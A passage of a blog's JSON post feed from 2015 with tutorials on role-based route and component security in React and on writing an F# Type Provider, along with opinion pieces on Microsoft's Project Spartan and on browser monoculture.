not logged in (which I am using a userService to determine) and we can also get the path that we’re trying to get to from transition.path to pass along with the redirect and then send you back after you do log in.\nNow let’s see a usage of it:\n'use strict'; import React from 'react'; import AuthenticatedRoute from './AuthenticatedRoute'; class UserProfilePage extends AuthenticatedRoute { constructor(props) { super(props); } render() { //render logic here } } export default UserProfilePage; Pretty easy ey? We just extend (inherit) from our AuthenticatedRoute and it’s all sorted.\nAdding roles Now thatwe’ve got basic security checks going let’s setup it up to work out that not only if you are logged in you also have permission to get to where you want to go. You’re logged in as a standard user but try and get into the site administration system, we probably want to stop that. To do that we’ll expand our willTransitionTo method logic:\nstatic willTransitionTo(transition) { if (!userService.authenticated) { transition.redirect('login', {}, { 'nextPath': transition.path }); } else if (this.rolesRequired) { let userRoles = userService.currentUser.roles; if (!this.rolesRequired.every(role => userRoles.indexOf(role) >= 0)) { transition.redirect('not-authorised'); } } } So I’ve added an else if block, and I’m looking for another static on the component, a static property called rolesRequired which would be an array of roles that are required for the user to access this particular route. If there are roles required to get to this page then the user must have all of these roles, the .every query on the array (you could implement this as a ‘require any of these roles’ use the .some array query method). Then we do a redirect away if the user can’t access the route just like with login.\nAnd how do we use this new update:\n'use strict'; import React from 'react'; import AuthenticatedRoute from './AuthenticatedRoute'; class UserAdminPage extends AuthenticatedRoute { static get rolesRequired() { return ['admin']; } constructor(props) { super(props); } render() { //render logic here } } export default UserAdminPage; Because I don’t want the rolesRequired property value to be mutable I’m implementing this as a get-only property, which is the get <name>() { ... } syntax. Pretty simple and clean I reckon.\nGoing async Not everything that we can do can be synchronous, I’ve assumed that is the case so far but maybe loading the profile happens and it might not have happened before the navigation occurs. Say our userService now looks like:\nuserService.getProfile().then(profile => ...) Now we return a promise from the userservice’s getProfile method, how does that fit into a synchronous flow of navigation?\nConveniently the willTransitionTo method can be made asynchronous by changing the parameters passed in:\nstatic willTransitionTo(transition, params, query, callback) { ... } The additional parameters are:\nparams - the url segments defined, like an id or such if you’ve defined /foo/:id query - the query string info of the URL callback - a function to invoke once an async operation has completed The last argument, callback, is the one that is of interest to us now. The way react-router works is it looks at the number of arguments your function takes and if it’s 4 then it will hault the navigation until that callback is invoked, and you invoke the callback regardless of success of failure. So let’s update our code:\nstatic willTransitionTo(transition, params, query, callback) { if (!userService.authenticated) { transition.redirect('login', {}, { 'nextPath': transition.path }); } else if (this.rolesRequired) { userService.getProfile().then(profile => { let userRoles = profile.roles; if (!this.rolesRequired.every(role => userRoles.indexOf(role) >= 0)) { transition.redirect('not-authorised'); } callback(); }, err => { transition.redirect('error', { error: err }); callback(); }); return; } callback(); } Now that we have access to the callback once the async request has completed we invoke it and then bail out of the function. If we didn’t do a role check we’ll still call callback, else react-router doesn’t know that the navigation event is completed.\nConclusion There we go, page-to-page security using react-router’s built in hooks to add checks in our React SPA. I think it works pretty cleanly by giving us a base type to inherit from and simple logic. We can always add additional conditional steps if we want to add different security checks as well.\nThe one thing that this won’t necissarily work well for is if you’re using the nested routing with react-router. Because that only navigates a section of the page rather than the whole page you might want to look at the approach I talked about in my previous posts.\nYou can find a basic implementation in the code from my ANZCoders talk.\n", "id": "2015-06-08-implementing-security-in-react-with-react-router" }, { "title": "Chauffeur on uHangout", "url": "https://www.aaron-powell.com/posts/2015-06-06-chauffeur-on-uhangout/", "date": "Sat, 06 Jun 2015 00:00:00 +0000", "tags": [ "umbraco", "chauffeur" ], "description": "I recently talked about Chauffeur and my thoughts on deployments on uHangout.", "content": "Last year I introduced a new tool I’ve been working on called Chaffeur which aims to help deployments in Umbraco.\nA few weeks ago my friend Warren Buckley invited me on his weekly Umbraco show, uHangout to talk about Chauffeur and deployments with Umbraco. If you missed it you can go back and watch it online.\n", "id": "2015-06-06-Chauffeur-on-uhangout" }, { "title": "Talking about front-end development on ANZCoders", "url": "https://www.aaron-powell.com/posts/2015-06-06-talks-on-anzcoders/", "date": "Sat, 06 Jun 2015 00:00:00 +0000", "tags": [ "anzcoders", "web-dev", "gulp", "react" ], "description": "I did two talks at ANZCoders on front-end development, covering the toolchain and a look at React.", "content": "Two weeks ago was the first ANZCoders virtual conference and I was lucky enough to present two sessions. Being a virtual conference all the content was recorded an you’ll be able to watch them on YouTube if you missed the sessions.\nThe wonderful world of front end tools Link\nIn recent years there has been a huge change in the way we do front end applications. Back in the day we had tools like Client Dependency but these days runtime bundling/minification is no longer seen as the way to go, the rise of npm the way we manage dependencies and lastly there’s the rise of the transpiler, be it a language-to-JavaScript transpiler like React or we’re using Babel to use ES6 features today.\nIn this talk I look at what tools we as ASP.Net developers need to start looking at, I cover off:\nUsing Yeoman as a generator to create an ASP.Net 5 application Getting external modules with npm or bower, with my preference being to use npm Managing your dependencies with browserify or webpack I also talk about consuming dependencies, my recommenation is using ES2015 modules and transpile them down How to do a ‘build’ of client assets using grunt or gulp. I was originally a grunt user but have since moved to gulp and am liking it more and more If you’re building ASP.Net application (or any web applications) today and you’re not using these tools in your toolchain then you’re really missing out here.\nReact, another JavaScript framework? Link\nI’ve recently had the opportunity to work on a greenfields project where we got to make a lot of the technology choices. Because we wanted to build a SPA I made the decision that we’d use React for the UI of the application.\nWith this talk I more looked at what problem space React works in, some common concerns people have about React (aka, JSX) and finished off with an application I built showing common things like:\nSecurity (although, really basic security) Routing, via react-router Real-time communication with SignalR The code for my sample application can be found on GitHub and also includes a number of the things I talked about in the other talk, using Gulp for building the files from JSX to JavaScript, etc.\n", "id": "2015-06-06-talks-on-anzcoders" }, { "title": "Writing a F# Type Provider", "url": "https://www.aaron-powell.com/posts/2015-02-06-writing-a-fsharp-type-provider/", "date": "Fri, 06 Feb 2015 00:00:00 +0000", "tags": [ "f#", "fsharp" ], "description": "A walkthrough of how to create a F# Type Provider.", "content": "I was recently asked to give a talk at the Sydney F# User Group about how to write a Type Provider (and other things).\nNow I’m fairly new to writing F# and even newer to writing Type Providers but having done code generation in the past using various .NET APIs (DSL’s, CodeDom, T4) I’m well versed in the pain that is to be expected when doing code generation.\nWhat’s a Type Provider?If you haven’t come across Type Providers before what they are is something that hooks into the F# compiler to generate types based on some pre-conditions. The most common usage is to generate data source information, such as a SQL data context, strongly typed CSV’s or classes from JSON.\nThe primary advantage here is that it’s done at the compiler level, types are generated then and those types are used in your codebase. If something changes in your data schema, say the properties of a JSON object change, you hit a compiler error rather than a runtime error, and that’s pretty neat.\nSounds cool, how do I get started?When writing a Type Provider you can probably generate something without any external dependencies. Unfortunately that is a hell of a lot of code to write to build some of the stuff out, code that you’re likely to get wrong or is just painful to write. If you look at any of the samples out there or existing Type Providers you’ll see two files named something like ProvidedTypes.fsi and ProvidedTypes.fs. What these contains is some nice base classes for starting your implementations.\nNote: Presently I don’t know exactly where you get them from, there seems to be no NuGet package or anything, instead what I will be doing for this walkthrough is copying them from the F# Samples project. If someone knows where you get the “master” copy from or a NuGet package to reference I’m all ears!\nEdit: As has been pointed out in the comments there is a NuGet package which will include the appropriate base classes, FSharp TypeProviders Starter Pack. I haven’t updated the code below to work with it so there may be some minor differences.\nWe’ll start be creating a new F# library project then copy in our ProvidedTypes.fs/fsi files and deleting Library1.fs.\nFile -> New -> Type ProviderFor this walkthrough I’m going to create the super-simple Type Provider I demoed at the F# User Group. It’s called StringTypeProvider so create a new F# file named that.\nLet’s also open a few namespaces so it looks like so:\n1 2 3 4 5 6 7 namespace Samples.FSharp.StringTypeProvider open System open System.Reflection open Samples.FSharp.ProvidedTypes open Microsoft.FSharp.Core.CompilerServices open Microsoft.FSharp.Quotations Note: Samples.FSharp.ProvidedTypes is the namespace for the stuff I got imported.\nNext we’ll create our Type Provider type:\n1 2 3 [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() This is a compiler error for the moment but we’ll get to that.\nWe’ve done three things here:\nCreated a type that has an attribute of TypeProvider. This tells the F# compiler that this type is a Type Provider and to use it as such Created a type that has a constructor argument of TypeProviderConfig which we then alias to this for us to use internally Inherited from a type called TypeProviderForNamespace which takes the complexity of our type construction (which we’ll get to later) The final thing we need to do before we go about implementing our Type Provider is tell the F# compiler that this assembly has Type Providers in it, we do that with an assembly attribute, so put this in the AssemblyInfo.cs (or somewhere else):\n1 2 [<assembly:TypeProviderAssembly>] do() So far our file looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 namespace Samples.FSharp.StringTypeProvider open System open System.Reflection open Samples.FSharp.ProvidedTypes open Microsoft.FSharp.Core.CompilerServices open Microsoft.FSharp.Quotations [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() [<assembly:TypeProviderAssembly>] do() Building the basicsThere’s a few basic things that you’ll need to do for every Type Provider that you create, you need to:\nCreate a namespace Create a type Add members to the type Add type to the namespace Add type to the assembly For the namespace you can generate anything you want, you can get the namespace from the current assembly (ie - your project) but adding types to someone else’s namespace is a bad idea, you might generate a type that clashes with something they too have created. Because of this you’re better off creating your own namespace. Also we’re going to need a reference to the assembly, let’s set that up:\n1 2 3 4 5 6 [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() let namespace = "Samples.StringTypeProvider" let thisAssembly = Assembly.GetExecutingAssembly() Now we’ll create our type to “export” from the Type Provider and export it:\n1 2 3 4 5 6 7 8 9 10 [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() let namespace = "Samples.StringTypeProvider" let thisAssembly = Assembly.GetExecutingAssembly() let t = ProvidedTypeDefinition(thisAssembly, namespaceName, "StringTyped", Some typeof<obj>) do this.AddNamespace(namespace, [t]) The let t = ... line creates us a new type that will be exported by the namespace. I’ve named it StringTyped so when using the Type Provider we’d access it via Samples.StringTypeProvider.StringTyped. When creating a new Type Definition you need to specify the base type to inherit from, it’s an Option type of type and can have anything as the base type. Generally speaking you’ll want to use obj as the base type but really you could use anything you wanted as your base type. If you really want to generate a slimmed down type you can set the HideObjectMethods property to false to suppress the intellisense for members exposed off System.Object, members such as ToString.\nLastly we add the type and namespace to the type provider using the AddNamespace method.\nPassing arguments to our Type ProviderThe way I want to use my Type Provider is like so:\n1 type helloWorld = Samples.StringTypeProvider.StringTyped< @"Hello World!" > For this to happen I need to specify that it will receive an argument. This is done by defining a static parameter:\n1 let staticParams = [ProvidedStaticParameter("value", typeof<string>)] I’m creating it as an array as I’ll need an array later, but essentially what I’m doing is saying that there will be a static parameter provided, it will be a string and I want you to call it value.\nNext up I need to handle what will happen when the Type Provider is invoked, I do this by defining static parameters on my Type Definition created above:\n1 2 3 4 do t.DefineStaticParameters( parameters = staticParams, instantiationFunction = ... ) There’s two things we’re providing here, the list of static parameters and an instantiation function. This instantiation function is what will be called by the Type Provider when the compiler comes across it, so it’s where we want to generate our logic for actually building something up and it takes an F# function that receives the name of the type (ie - StringTyped) and then and obj[] of the parameters which were provided. This array will match to the parameters we define with the parameters property so in our case we expect a single parameter that is a string. I’m going to use a match to validate this:\n1 2 3 4 5 6 7 8 9 10 do t.DefineStaticParameters( parameters = staticParams, instantiationFunction = (fun typeName paramValues -> match paramValues with | [| :? string as value |] -> ... | _ -> failwith "That wasn't supported!" ) ) So our primary match condition checks:\nIs this an array It has a single value That value can be cast as a string, which I’ll do and call value (this is important later on) Finally from this fun we need to return a Type Definition so let’s create that:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 do t.DefineStaticParameters( parameters = staticParams, instantiationFunction = (fun typeName paramValues -> match paramValues with | [| :? string as value |] -> let ty = ProvidedTypeDefinition( thisAssembly, namespaceName, typeName, Some typeof<obj> ) ty | _ -> failwith "That wasn't supported!" ) ) This is basically the same as we used originally with the only difference being that I’m using the name passed in rather than a hard-coded name.\nAdding constructorsNow that I have created my Type to be instantiated it’s time that I make it do something useful. To do that I’m going to create a constructor to it.\nThanks to our base class creating a constructor:\n1 2 3 4 let ctor = ProvidedConstructor( parameters = [], InvokeCode = fun args -> <@@ value :> obj @@> ) Well that was easy wasn’t it! I use the ProvidedConstructor method, define any parameters I want and finally give it the code that I want to run. The code is in the form of an F# Quotation which is that the <@@ @@> syntax is all about and I am saying that the available value (captured earlier) will be downcast to obj.\nIf you’re curious this code, when used, compiles down to the following C#:\n1 var something = (object)"Hello World"; Where something was the name of our instance and Hello World the value we passed to it. Pretty cool huh!\nGenerating intellisenseWe’re generating a type on the fly here so it stands to reason that documentation is going to be sparse. If your users are using Visual Studio it might be nice to give them some intellisense help to guide them onto your usage. Conveniently the API we’re working with to build our Type Provider gives us such a facility:\n1 ctor.AddXmlDoc "Initialise the awesomes" And there you go, intellisense done! Now there are actually two others ways to generate intellisense, it can either be dalyed\n1 ctor.AddXmlDocDelayed (fun () -> "Initializes a the awesomes") Meaning that until the intellisense is requested the function won’t be evaluated. This can be useful if you’re generating your documentation based off some intensive process. Remember that a Type Provider is evaluated at compile time so if it’s something expensive that you don’t have to do consider delaying it.\nYour other option is to use a computed doc:\n1 ctor.AddXmlDocComputed (fun () -> "Initializes a the awesomes") While this looks similar to delayed the difference is that delayed docs are generated then cached while computed docs are generated evey single time.\nOnce you’ve setup your documentation the final step is to add your constructor to the type:\n1 ty.AddMember ctor PropertiesNow that we have a constructor let’s add some properties to the type you’re going to get.\n1 2 3 4 5 6 let lengthProp = ProvidedProperty( "Length", typeof<int>, GetterCode = fun args -> <@@ value.Length @@> ) ty.AddMember lengthProp There we go, that’s pretty easy isn’t it! We have a few things that we’re doing like giving the property a name, Length, giving it a type, int and then we can provide getters and setters using F# Quotations again. These functions can be as simple or as complex as you like. I’m doing something simple here but you could say, generate a setter that does validation by adding a more complex body.\nI could even do something like bulk generate properties:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 let charProps = value |> Seq.map(fun c -> let p = ProvidedProperty( c.ToString(), typeof<char>, GetterCode = fun args -> <@@ c @@> ) let doc = sprintf "The char %s" (c.ToString()) p.AddXmlDoc doc p ) |> Seq.toList ty.AddMembersDelayed (fun () -> charProps) You’ll see here that you can add properties (well, any members) in a delayed fashion, again useful when you’re generating them from a data source, like a SQL schema or REST end point.\nThere’s a bunch of other properties on your properties that you can set, if you’re after a static then set the IsStatic to true (default is false). Check out what you get from intellisense (or is defined in the fsi) for the full details of what you can do to a property.\nMethodsWhen generating a method it’s similar to all the other members but with the difference, we get to create a method body. Here’s a method we could make:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 let reverser = ProvidedMethod( methodName = "Reverse", parameters = [], returnType = typeof<string>, InvokeCode = (fun args -> <@@ value |> Seq.map (fun x -> x.ToString()) |> Seq.toList |> List.rev |> List.reduce (fun acc el -> acc + el) @@>)) ty.AddMember reverser This takes our string and reverses it through a few pipeline steps. You can though make something as complex as you want, doing whatever you need it to do.\nReady for consumptionThere we have it, our Type Provider is ready for us to use. If you want to see the completed Type Provider it can be found here.\nNow it’s worth talking about some gotchas and things to be mindful of.\nMember Names Remember that F#’s member naming is a lot more relaxed than C#, you can use a lot more characters provided you escape them. That means the following code is valid:\n1 2 3 4 5 type snowman = Samples.StringTypeProvider.StringTyped< @"☃" > let doYouWantToBuildASnowman = snowman() doYouWantToBuildASnowman.``☃`` Yep, that’s a snowman property. Isn’t unicode fun!\nVisual Studio locks the assembly This is something that hits me all the time when I’m mucking with Type Providers, when you reference a Type Provider, either from a project or within the F# interactive. The problem here is that when you write some code, compile and then use it you’ve got your assembly locked. Now you can’t change it until you restart Visual Studio. Yay…\nYou’re impacting compile time Remember that a Type Provider is something that is evaluated at compile time by the F# compiler. The more complex the processing you do with your Type Provider the greater an impact you have on compile time. If you’re worried about doing something too intense don’t be afraid to leverage the delayed features, be it for documentation or member creation.\nConclusionThere you have it folks, a walkthrough on how to create an F# Type Provider. Remember that there is a video from F# Sydney that also covers this (and some other rambling on my part) and you can find the full code as a gist.\n", "id": "2015-02-06-writing-a-fsharp-type-provider" }, { "title": "Microsoft's Project Spartan and speculating Internet Explorer's future", "url": "https://www.aaron-powell.com/posts/2015-01-25-project-spartan-and-internet-explorer/", "date": "Sun, 25 Jan 2015 00:00:00 +0000", "tags": [ "internet-explorer" ], "description": "On the 21st of January Microsoft showed off their new browser code named Project Spartan, so let's have a look at what it's about.", "content": "Before we dive in, I don’t work for Microsoft but I am an Internet Explorer MVP and a member of the IE userAgent’s, so what I’m discussing here is based on what is publicly available and my own speculations.\nOn the 21st January Microsoft had an event to show off what is coming next in their Windows 10 platform, the future of Windows and importantly for us Web Developers talked about Project Spartan which had previously been speculated about.\nIf you missed what’s what with Spartan go read the IE team’s blog post.\nWhat is Spartan?The first logical question is what’s Spartan all about? Basically what it is is Microsoft has taken their rendering engine (Trident) and JavaScript engine (Chakra) and produced a brand new browser chrome (the UI) for it (for the most part, there’s a few more things I’ll touch on shortly). Now the name Spartan is a code name so what it finally get’s named is unclear, but what is clear is that it’s unlikely to use the Internet Explorer brand. This is really quite interesting as I’ve previously suggested the Internet Explorer brand can’t survive.\nAlso considering a new chrome is really exciting as the IE chrome that we’re familiar with still has a lot of similarity with the first versions of IE. Starting this from scratch rather than continuing with the existing chrome gives a chance to rethink how users use the browser, which we saw with things like the lack of toolbars and Cortana integration.\nA browser by any other nameTrident and Chakra are very capable engines, if you look at some of the new features in the Windows 10 Preview as well as looking at status.modern.ie for whats shipped, in preview or in development there’s a lot the latest releases contain.\nBut what’s interesting about Trident, or more specifically, how Trident ships, can be seen in the animation about half-way down the IE team’s blog post. The core is mshtml.dll (which resides in Windows\\System32) and on my Windows 8.1 machine contains the ability to run as IE11, IE10, IE9, IE8, IE7 and IE5.5. That’s 6 different browsers IE can run at, or at least attempt to emulate. I’ve been a developer for a while and I know I don’t like dealing with code written the previous year (especially if it’s my code) let alone dealing with code that is at least 14 years old. Change something here and have side effects over there and the more legacy pathways you need to support the harder it gets.\nBut mshtml.dll is used for a lot of different things, like Outlook desktop. Kind of don’t want to make big changes that impact that! And of course there’s all those shitty enterprise applications that think Windows XP is the pinical of web development…\nWhat’s interesting about Spartan is that while mshtml is still there is isn’t responsible for rendering websites, it’s only responsible for intranet sites. Instead for public websites a new assembly, edgehtml.dll contains just the latest work from the IE teams without the overhead of multiple versions of flexbox, old vendor prefixes or a box model that was fixed years ago.\nAlso because the changes aren’t in the (now) old rendering engine they can (in theory at least) be revised and released faster, hopefully getting us to the point where version numbers are no longer important, you build for the spec and only the spec.\nThe future of IE?Well then, we’ve got a new browser chrome and a forked browser engine, what does that mean for IE? IE will be around in Windows 10 from what we know but Spartan seems to be the default browser with IE being just another choice of browser on the platform. Whether IE continues beyond Windows 10 is something that I’m going to be watching with interest. After all there’s still people out there making extensions for IE, ActiveX controls, etc, all of which are tied to the current chrome and mshtml.\nNow let’s move on to what they haven’t talked about and start speculating.\nPluginsNothing was talked about plugins, during the demo they showed off things like inking support (which looks really useful), but not about writing 3rd-party extensions. A lot of people don’t realise that creating extensions for IE is possible, it’s just not particularly nice. It’s been speculated that Chrome extensions will be supported in Spartan and I really hope that’s the case, or at least they are highly interoperable, so we don’t have a case of reinventing the wheel and allow us web developers to have a common platform for browser extensions.\nIt’ll be v1While the rendering engine will be the latest from Trident, the UI is being done from sratch. Remember Firefox v1? Chrome v1? These weren’t what they are today. To push out a new browser chrome, handle multi-loading of the rendering engines adding new features all of that stuff, there’s only a finite amount of time. We can expect things to be v1. That’s not to say that I expect it to be sub-standard or anything but I know I’ll be submitting feedback to help direct the browsing experience. After all it’s not every day you get a brand new browser chrome is it?\nWe already know F12’s Dev Tools will be there which is all I really want!\nConclusionI’m really looking forward to this coming and trying Spartan out. We know it’s not coming just yet in the Window’s 10 builds, but really the chrome isn’t what I’m interested in, it’s the browser engine. That’s already available in the IE builds on Windows 10 and remoteIE.\nThe future of the web looks good.\n", "id": "2015-01-25-project-spartan-and-internet-explorer" }, { "title": "The danger of the 'Just Use WebKit' mindset", "url": "https://www.aaron-powell.com/posts/2015-01-26-the-danger-of-the-just-use-webkit-mindset/", "date": "Sun, 25 Jan 2015 00:00:00 +0000", "tags": [ "web", "browsers", "internet-explorer" ], "description": "Just use WebKit seems to be a common belief in web developers, but there's a danger involved in that mindset.", "content": "\nSigh\nAs a web developer working in the Microsoft space I hear this statement a lot. Go check out the IE UserVoice and you’ll find this.\nI want to talk about why this mindset of “just use WebKit” is a dangerous one.\nChrome isn’t WebKitWhen a lot of people say this to me most of the time they are actually saying that they’d prefer IE to be Chrome. It’s somewhat strange that so many web developers seem to have forgotten that Chromium forked WebKit and made Blink nearly 2 years ago. Blink just still uses the -webkit vendor prefix rather than creating their own because it turns out that web developers are pretty lazy with vendor prefixes, so much so Microsoft supports -webkit.\nChrome’s not WebKit, who is? Right, if Chrome isn’t WebKit then when you’re using WebKit you must be using Safari right? Well… close but not quite. Paul Irish has a good write up about the breakdown of WebKit. It’s a bit old, pre-Chromium’s fork, but a lot of it holds true still, most browsers still swap out parts and let’s not forget that Safari’s work is done in private before being pushed downstream to the OSS project, or at least that’s the expectation.\nEditor note: Just to clarify Safari isn’t WebKit, Safari is just a port of WebKit (see the link above). Apple (who produces Safari) is one of the primary contributors to WebKit, but that’s not to say that everything in Safari is in WebKit, Safari uses a different JavaScript engine for example, nor is everything in WebKit in Safari. What I meant be ‘Safari’s work is done in private’ is about Safair the browser, when features are included, etc, not that WebKit is developed in private by Apple.\nAlright, maybe I’m getting hung up on WebKit specifically, let’s get back to the common point “be Chrome”.\nThe browser monocultureAs a web developer this is one of the most scary concepts, having a browser monoculture. I’ve been working in the web industry for 10 years, so I came in on the tail of the browser wars, just as IE6 had become the winner. I remember developing for Netscape but it was already becoming a rarity, we had entered an era of monoculture and the only browser was IE6.\nIn this era the web stagnated, there was no innovation going on, there was no incentive for innovation because after all there was no competition.\nI don’t want to see this happening again.\nThe belief that one browser engine is superior to another is a very subjective belief, for example check out the current ES6 compatibility table (sorted by number of features):\nCurrently IE vNext (which will be the core of Project Spartan) and Firefox 37 (currently nightly) are on par with Chrome 41 lacking a bit (although Chrome 42 which is the latest Canary has 52% coverage). Dropping Chakra for v8 would be a bit of a backwards step in terms of ES6 support wouldn’t it?\nSimilarly Can I Use can produce a good comparison between the browsers on a broader feature set.\nWhat we can see is that different browsers implement different features at different rates, and this leads to innovation. Browser A implements something, gets feedback on the implementation, other browsers implement it, problems are found, fixed, redesigned, rinse and repeat.\nIn fact this is how standards happen.\nIn a monoculture an implementation is done and that’s all there is. We still see this happening in the web platform today, touch events are a great example. Now imagine that lack of design with everything driving the web. We’d end up with people doing crazy things like the <blink> element, VBScript instead of JavaScript or plenty of other whacky things.\nConclusionThe trend of web developers thinking that there should be only a single browser engine is a dangerous one, we saw what happened after the last browser war.\nCompetition is an important part of any industry and the web is no different. Trident as it was in 2007 is very different to the Trident of 2014 and we know that Spartan brings changes to put the legacy in places that are even harder to get to, and this is thanks to competition.\nSo don’t be narrow minded, understand how the web platform works and why multiple players are the only way we’ll continue to evolve the web in the way we want it to.\n", "id": "2015-01-26-the-danger-of-the-just-use-webkit-mindset" }, { "title": "Evolving authentication on React components", "url": "https://www.aaron-powell.com/posts/2015-01-17-evolving-authentication-on-react-components/", "date": "Sat, 17 Jan 2015 00:00:00 +0000", "tags": [ "react", "security" ], "description": "Taking what we learnt in the last post and evolving the approach.", "content": "In my last post I talked about how you can do Authentication on React components using mixins.\nUsing a mixin to add role-based security to any component we create is really handy but it does have one real problem, you have to inherit that mixin on every component you want to have it on. It works well when you want to do something like hide links or buttons, but it starts to fall down when you want to hide sections of components, maybe a row in a table is only there for certain roles, or a section of a menu isn’t visible for everyone.\nIn this post I wan to have a look at an alternate approach to adding role-based security only in a more generic fashion.\nRequireRoles ComponentAs I said in the post we used a mixin that we added to components, this time I’m going to create a dedicated component which I’ll call RequireRoles. My goal is that you would end up with a usage like this:\n<RequireRoles profile={...} roles={...}> <div className="admin-widget"> ... </div> </RequireRoles> We’ll start by creating our component:\nvar RequireRoles = React.createClass({ permitted: function (requiredRoles) { return this.props.profile.roles .some(role => requiredRoles.some(rr => rr === role) ); }, render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } if (!this.permitted(this.props.roles))) { return null; } //TODO: Render something on success } }); I’ve grabbed the code that I had in the last sample so if you’ve not read it check it out to get what it’s doing. Alternatively I could have used the mixin that we defined but I wanted to keep this sample stand-alone.\nThe only new thing we need to do here is deal with rendering when the roles are valid. For that we need to work with the children property.\nvar RequireRoles = React.createClass({ permitted: function (requiredRoles) { return this.props.profile.roles .some(role => requiredRoles.some(rr => rr === role) ); }, render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } if (!this.permitted(this.props.roles))) { return null; } return this.props.children; } }); Well that was simple wasn’t it, all we return is this.props.children. It’s worth nothing though that if you look back at my original code snippet:\n<RequireRoles profile={...} roles={...}> <div className="admin-widget"> ... </div> </RequireRoles> The children of the component is the <div> and there is only a single child. This might be something that I’m doing wrong but I’ve found that you can only have a single child, if there are multiple children then nothing rendered, but this is a pretty easy requirement to meet, wrapping everything in a <div> and it’s all good.\nBuilding our <App>Now that we’ve got our component created how does our <App /> look?\nvar App = React.createClass({ getInitialState: function () { return { profile: {} }; }, componentDidMount: function () { profileLoader().then(profile => this.setState({ profile: profile })); }, render: function () { return React.createElement('div', null, React.createElement(RequireRoles, { roles: ['admin'], profile: this.state.profile }, React.createElement('div', null, React.createElement('h1', null, 'Admin stuff here'), React.createElement('h2', null, 'Something else for the admin') ) ) ); } }); Yeah I didn’t use JSX here to show how it’d look “compiled”.\nConclusionThere we have it, that’s how we can build a reusable component for wrapping other DOM elements/components in role validation. By creating a component that returns the this.props.children rather than something crafted, means that you’ve created a wrapper component.\nIf you combine this with the mixin from the last post then you’ll have covered pretty much every approach to doing role-based validation on components in React applications.\nAgain there is a working demo here, on jsbin.\n", "id": "2015-01-17-evolving-authentication-on-react-components" }, { "title": "Authentication on React components", "url": "https://www.aaron-powell.com/posts/2015-01-15-authentication-on-react-components/", "date": "Fri, 16 Jan 2015 00:00:00 +0000", "tags": [ "react", "security" ], "description": "Here's an approach on how to create React components that have role-based security on them.", "content": "When building a Web Application, or any application at all, it’s often required that you hide/show functionality depending on the permissions which the logged user has associated with them. The Web Application I’m currently working on has this requirement, only users who are in the administrator group will be able to access the administration section of the website.\nIn this application I’m using Facebook’s React JavaScript framework and in this post I want to look at the approach we’re using to do role-based permissions on the React components that we are creating.\nIt’s worth pointing out that doing this is only adding client-side security for your components, not server-side security. In an application you’ll want to make sure that you’re also checking the users permissions on the server too to ensure that users can’t type in a URL and get to pages/data they shouldn’t. I won’t be covering server-side security here as that depends on your server platform and your security model.\nMixinsThe easiest approach to this I have found is to leverage the mixin feature of React. A mixin is kind of like a base class, it you “inherit” from zero or more mixins and React will extend your component with the members defined in the mixin.\nFor this I’m going to create a mixin named RoleRequiredMixin:\nvar RoleRequiredMixin = { }; If you haven’t used mixin’s before then you’ll notice they are just a standard JavaScript object that you add members to. I’m going to create a member called permitted which takes some roles and checks them against the user.\nvar RoleRequiredMixin = { permitted: function (requiredRoles) { //TODO: Implement } }; Ok, now the question here is how to find out who the current user is to check against them.\nLoading profiles There’s plenty of different ways which you can construct a profile for the user, it could be info rendered into the DOM during the page load, you could have an AJAX request to load it or a lot of different ways. How you construct it is not particularly important, what is important is getting into your component. My recommendation is that you pass the profile to your component as a property rather than resolving it in the permitted method. The reason for this that it gives me the ability to load it once and share to multiple components, so I’m going to assume our parent component, aka the page, takes care of that for us and just read it from the props of our component:\nFinishing our permitted method var RoleRequiredMixin = { permitted: function (requiredRoles) { return this.props.profile.roles .some(role => requiredRoles.some(rr => rr === role) ); } }; And there we go, our permitted method is now implemented. Here we’re:\nGetting the roles array from our profile Performing a some to find any roles that… Matches any of the required roles You’ll also notice that I’m using the ES6 fat arrow feature (which React understands and transpiles down) to make our some’s look more lambda-ish.\nUsing our mixinNow that our mixin is created let’s make use of it. I’ll start off with a simple component that’s available when the user has a role of user:\nvar UserComponent = React.createClass({ render: function () { return null; } }); Here’s the start of our component, let’s now add the mixin:\nvar UserComponent = React.createClass({ mixins: [RoleRequiredMixin], render: function () { return null; } }); Excelent, our component has been extended, time to start implementing the render method. I’m going to make an assumption that the profile might be asynchronously loaded so the first thing I’ll do is check for a profile, if there’s none then we’ll not render the component:\nvar UserComponent = React.createClass({ mixins: [RoleRequiredMixin], render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } return null; } }); When the checks for the profile existing and being well formed pass I can call our mixin method:\nvar UserComponent = React.createClass({ statics: { requiredRoles: ['user'] }, mixins: [RoleRequiredMixin], render: function () { if (!this.props.profile || !this.props.profile.roles) { return null; } if (!this.permitted(UserComponent.requiredRoles))) { return null; } return React.createElement("div", null, "This is a user component!"); } }); As you can see here whenever a check fails we return null from the method. By doing this we are telling React that this component isn’t actually rendering anything. If it succeedes then we render out our component as normal.\nAnd that’s our UserComponent completed. For the list of required roles I’ve created a static on the component which is passed in. The reason I did this is so if we have multiple instances of this component the role list is the same, reducing memory overhead.\nUsing our componentWith our component created we can now go about using it.\nvar App = React.createClass({ render: function () { return React.createElement("div", null, React.createElement(UserComponent, { profile: this.state.profile }) ); } }); React.render(React.createElement(App, null), document.body); You’ll see that I’m passing the profile down as a property which comes from the state of our React app. Let’s go about getting the profile:\nvar App = React.createClass({ getInitialState: function () { return { profile: {} }; }, componentDidMount: function () { profileLoader().then(profile => this.setState({ profile: profile })); }, render: function () { return React.createElement("div", null, React.createElement(UserComponent, { profile: this.state.profile }) ); } }); For illustration purposes I’m loading the profile from an asynchronous method, this could be doing an AJAX call or any other method of loading the data.\nConclusionThere we have it, a very simple way we can use React’s mixin feature to create components that will only be rendered when a user has a required role. We used the some array method to perform check if the user has any of the required roles but you could change that to an every if you wanted to make sure that users have all of the required roles set.\nI’ve published a full example on jsbin which shows different components with different roles expected and a basic profile loader.\n", "id": 